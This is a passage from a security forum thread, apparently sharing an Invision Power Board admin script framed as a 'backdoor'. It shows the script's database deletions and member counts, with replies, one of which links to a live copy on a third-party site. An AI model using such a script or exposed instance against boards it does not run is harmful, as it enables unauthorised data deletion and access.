echo "Conf_settings information deleted, next!<br /><br />";

$DB->query("DELETE FROM `".SQL_PREFIX."conf_settings_titles` WHERE conf_title_title = 'Invision Gallery Settings';");

echo "More conf_settings stuff deleted, moving on!<br /><br />";

$DB->query("DELETE FROM `".SQL_PREFIX."skin_templates` WHERE group_name LIKE 'skin_gallery_%';");

echo "Finally! Gallery skin template bits removed. Now, go about removing them there gallery files.";

setting_rebuildcache();

echo "</tr></td>";



break;



case 'Totals' :



echo "<tr><td><br /><br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."posts;");

$pcount = $DB->fetch_row();

echo "Total posts: ". $pcount['count(*)'] . "<br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."topics;");

$tcount = $DB->fetch_row();

echo "Total topics: ". $tcount['count(*)'] . "<br /><br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."members;");

$mcount = $DB->fetch_row();

echo "Total members: ". $mcount['count(*)'] . "<br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."members_converge;");

$mccount = $DB->fetch_row();

echo "Total members_converge: ". $mccount['count(*)'] . "<br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."member_extra;");

$mecount = $DB->fetch_row();

echo "Total member_extra: ". $mecount['count(*)'] . "<br />";

echo "<br /><br /></tr></td>";



break;



}



echo "<tr><td colspan='3' align='center' id='copy'>Invision Power Board &copy 2005 <a href='http://www.invisionpower.com' target='_blank'>Invision Power Services, Inc.</a><br><br>( <a href='" . BOARD_URL . "/index.php'>Board URL</a> | <a href='" . BOARD_URL . "/admin.php'>Admin CP</a> )<br> ;;</td></tr></table></body></html><!-- Keith's copy -->";

?>
View user's profile Send private message
PostPosted: Sat Apr 11, 2009 7:00 am Reply with quote
ThinSmoke
Advanced user
Advanced user
Joined: Nov 15, 2008
Posts: 55




Very nice share, thx alot :3
View user's profile Send private message
PostPosted: Wed May 06, 2009 1:56 pm Reply with quote
Dope-R
Beginner
Beginner
Joined: May 06, 2009
Posts: 1




Doesnt seem 2B a backdoor. Looks more like a testin tool;

http://www.vwfixx.com/forums/supascript.php
View user's profile Send private message MSN Messenger
PostPosted: Thu May 21, 2009 9:01 am Reply with quote
ThinSmoke
Advanced user
Advanced user
Joined: Nov 15, 2008
Posts: 55




Can still use it as a reference of lot of stuff : )
View user's profile Send private message
IPB Staff Official Backdoor for IPB (SupaScript)
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds